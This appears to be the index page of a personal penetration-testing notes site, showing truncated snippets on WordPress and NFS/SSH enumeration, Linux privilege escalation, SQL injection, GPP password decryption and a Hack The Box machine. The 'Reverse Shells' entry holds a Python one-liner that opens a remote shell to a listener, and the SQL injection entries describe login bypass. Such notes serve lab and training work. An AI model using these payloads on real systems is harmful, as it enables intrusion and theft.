Shuciran Pentesting Notes

Wordpress

Default paths: index.php, license.txt (contains useful information such as the installed WordPress version). wp-activate.php is used for the email activation process when setting up a new WordP...

Automated Enumeration (Linux)

LinPeas We can use linpeas on UNIX derivatives such as Linux. ./linpeas.sh | tee output.txt Unix_privesc_check We can use unix_privesc_check on UNIX derivatives such as Linux. The script support...

For Privilege Access (Linux)

Recursively find a string: # Find ETSCTF in every file under the current directory find . -type f -exec grep -H 'ETSCTF' {} \; 2>/dev/null # Identify any file (not directory) modified in the las...

SSH (tcp-22)

Enumeration Cipher algorithms supported: nmap -p22 10.10.1.3 --script ssh2-enum-algos Public key from the SSH server: nmap -p22 10.10.1.3 --script ssh-hostkey --script-args=ssh_hostkey=full Review i...

NFS (tcp-111)

NMAP Scan port and info on NFS nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.181.201 ... 111/tcp open rpcbind | nfs-showmount: |_ /var * | nfs-statfs: | Filesystem 1K-blocks Us...

Reverse Shells

Python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.175",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),...

SQL Injection MSSQL

Simple Commands Simple enumeration can be done with the following queries, which were taken from PayloadAllTheThings: # Version SELECT @@version # DB user SELECT user_name(); SELECT system_u...

SQL Injection

SQLi Authentication Bypass A SQL query for a normal login, then, looks like this: select * from users where name = 'tom' and password = 'jones'; If we control the value being passed in as $user, ...

Active (Easy)

Host entries 10.10.10.100 active.htb If Active Directory, synchronize NTP with the domain controller. Content SMB Enumeration SMB Full share replication to local machine [[SMB Dow...

SYSVOL (Groups.xml)

If we have access to a SYSVOL file, we can extract the “Groups.xml” file and decrypt the cpassword with gpp-decrypt utility: # Contents of Groups.xml cat ./active.htb/Policies/{31B2F340-016D-11D2-9...